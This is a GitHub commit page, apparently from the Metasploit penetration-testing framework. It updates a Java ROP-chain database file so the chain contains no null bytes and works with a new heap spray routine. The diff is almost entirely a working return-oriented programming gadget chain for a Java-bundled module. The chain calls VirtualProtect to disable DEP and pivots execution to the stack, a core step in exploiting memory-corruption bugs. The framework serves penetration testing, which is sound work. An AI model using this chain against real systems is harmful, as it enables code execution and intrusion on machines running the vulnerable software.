Skip to content

Commit ea4c88b

Browse files
sinn3rsinn3r
committed
Java Rop null-byte free
Our new heap spray routine does not like double nulls, so we need to adjust our ROP.
1 parent afcbaff commit ea4c88b

File tree

1 file changed

+21
-15
lines changed

1 file changed

+21
-15
lines changed

data/ropdb/java.xml

Lines changed: 21 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -6,22 +6,28 @@
66
</compatibility>
77

88
<gadgets base="0x7c340000">
9-
<gadget offset="0x0000252c">POP EBP # RETN</gadget>
10-
<gadget offset="0x0000252c">skip 4 bytes</gadget>
11-
<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
12-
<gadget value="0x00000400">0x00000400-> ebx</gadget>
13-
<gadget offset="0x00005249">POP EDX # RETN</gadget>
14-
<gadget value="0x00000040">0x00000040-> edx</gadget>
15-
<gadget offset="0x000011c0">POP ECX # RETN</gadget>
16-
<gadget offset="0x00051897">Writable location</gadget>
17-
<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
18-
<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
19-
<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
9+
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
10+
<gadget offset="0x00024c66">skip 4 bytes</gadget>
11+
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
12+
<gadget value="0xfffffdff">0x00000201</gadget>
13+
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
14+
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
15+
<gadget value="0xffffffff"></gadget>
16+
<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
17+
<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
18+
<gadget offset="0x00005937">POP EDX # RETN</gadget>
19+
<gadget value="0xffffffc0">0x00000040</gadget>
20+
<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
21+
<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
22+
<gadget offset="0x00051e67">Writable location</gadget>
23+
<gadget offset="0x00002e58">POP EDI # RETN</gadget>
24+
<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
25+
<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
2026
<gadget offset="0x000015a2">JMP [EAX]</gadget>
21-
<gadget offset="0x000362fb">POP EAX # RETN</gadget>
22-
<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
23-
<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
24-
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
27+
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
28+
<gadget offset="0x0003a140">ptr to VirtualProtect()</gadget>
29+
<gadget offset="0x00038c81">,PUSHAD # ADD AL,0EF # RETN</gadget>
30+
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
2531
</gadgets>
2632
</rop>
2733
</db>

0 commit comments

Comments
 (0)